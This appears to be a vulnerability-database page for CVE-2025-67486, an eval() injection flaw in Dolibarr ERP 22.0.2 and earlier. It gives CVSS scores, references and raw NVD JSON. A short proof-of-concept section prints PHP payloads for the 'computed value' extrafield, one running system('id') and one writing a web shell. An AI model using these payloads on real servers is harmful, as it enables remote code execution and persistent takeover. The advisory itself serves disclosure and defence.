CVE-2025-67486

Description

Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Versions 22.0.2 and earlier contains an authenticated remote code execution vulnerability in the user extrafields functionality. User-controlled input from the "computed value" field is passed to PHP's `eval()` function without adequate sanitization, allowing authenticated administrators to execute arbitrary PHP code on the server. As of time of publication, no patched versions are available.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* - VULNERABLE

Dolibarr ERP <= 22.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// PoC for Dolibarr CVE-2025-67486
// Payload to be entered in the "Computed Value" field of User Extrafields

// Example 1: Execute system command
$payload = "1; system('id'); //";

// Example 2: Write a shell
$payload = "1; file_put_contents('shell.php', '<?php system($_GET[\"cmd\"]); ?>'); //";

?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67486/
[4] VulDB https://vuldb.com/cve/CVE-2025-67486
[5] https://github.com/Dolibarr/dolibarr/blob/22.0.2/htdocs/core/lib/functions.lib.php
[6] https://medium.com/@abduxalilovjavohir/dolibarr-erp-authenticated-remote-code-execution-via-eval-injection-in-user-extrafields-dfc305d0118e
[7] https://medium.com/@abduxalilovjavohir/dolibarr-erp-authenticated-remote-code-execution-via-eval-injection-in-user-extrafields-dfc305d0118e

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67486", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:35.043", "lastModified": "2026-05-12T20:54:07.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Versions 22.0.2 and earlier contains an authenticated remote code execution vulnerability in the user extrafields functionality. User-controlled input from the \"computed value\" field is passed to PHP's `eval()` function without adequate sanitization, allowing authenticated administrators to execute arbitrary PHP code on the server. As of time of publication, no patched versions are available."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*", "versionEndIncluding": "22.0.2", "matchCriteriaId": "8F0C5A09-3719-4A29-AB96-B923F2FDE6C1"}]}]}], "references": [{"url": "https://github.com/Dolibarr/dolibarr/blob/22.0.2/htdocs/core/lib/functions.lib.php", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://medium.com/@abduxalilovjavohir/dolibarr-erp-authenticated-remote-code-execution-via-eval-injection-in-user-extrafields-dfc305d0118e", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://medium.com/@abduxalilovjavohir/dolibarr-erp-authenticated-remote-code-execution-via-eval-injection-in-user-extrafields-dfc305d0118e", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}